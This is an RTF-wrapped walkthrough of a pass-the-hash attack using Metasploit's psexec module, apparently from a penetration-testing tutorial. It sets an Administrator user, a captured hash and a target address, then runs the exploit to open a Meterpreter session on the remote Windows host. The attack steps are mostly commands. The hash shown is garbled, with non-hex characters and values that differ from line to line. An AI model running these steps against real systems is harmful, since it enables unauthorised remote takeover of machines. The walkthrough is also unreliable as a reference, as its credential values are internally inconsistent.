{\rtf1\ansi\ansicpg1252\cocoartf2758
\cocoatextscaling0\cocoaplatform0{\fonttbl\f0\fnil\fcharset0 UbuntuMono-Regular;}
{\colortbl;\red255\green255\blue255;\red38\green38\blue38;\red0\green0\blue0;}
{\*\expandedcolortbl;;\cspthree\c20000\c20000\c20000;\cspthree\c0\c0\c0;}
\paperw11900\paperh16840\margl1440\margr1440\vieww13440\viewh8400\viewkind0
\pard\tx720\tx1440\tx2160\tx2880\tx3600\tx4320\tx5040\tx5760\tx6480\tx7200\tx7920\tx8640\pardirnatural\partightenfactor0

\f0\fs28 \cf0 msf6 > use exploit/windows/smb/psexec \
\pard\tx560\tx1120\tx1680\tx2240\tx2800\tx3360\tx3920\tx4480\tx5040\tx5600\tx6160\tx6720\pardirnatural\partightenfactor0
\cf2 \
msf exploit(psexec) > set SMBUser Administrator\
SMBUser => Administrator\
\
msf exploit(psexec) > set SMBPass\
aad3b435b514004ccaad3b435b140ee:gbh5n356b58700ggppd6m2439ep\
SMBPass => aad3b435b514004ccaad3b435b140ee:gbh5n356b8700ggppd6m2439ep\
\
msf exploit(psexec) > set RHOST 192.168.1.80\cf3 \
\cf2 RHOST => 192.168.1.80\
\
msf exploit(psexec) > exploit\
As you can see from the output, the values SMBUSER, SMBPASS, and RHOST are needed to use the\
extracted Server Message Block (SMB) hash to log on to the remote machine. In this case those values\
are\
RHOST \'96 The local machine is 192.168.1.10. The remote host is 192.168.1.80.\
SMBUSER \'96 Administrator\
SMBPASS \'96 (the hash) aad3b435b514004ccaad3b435b140ee:gbh5n356b8700ggppd6m2439ep\
\
If all of the values are correct, then the command will pop open a Meterpreter session with the remote\
machine.}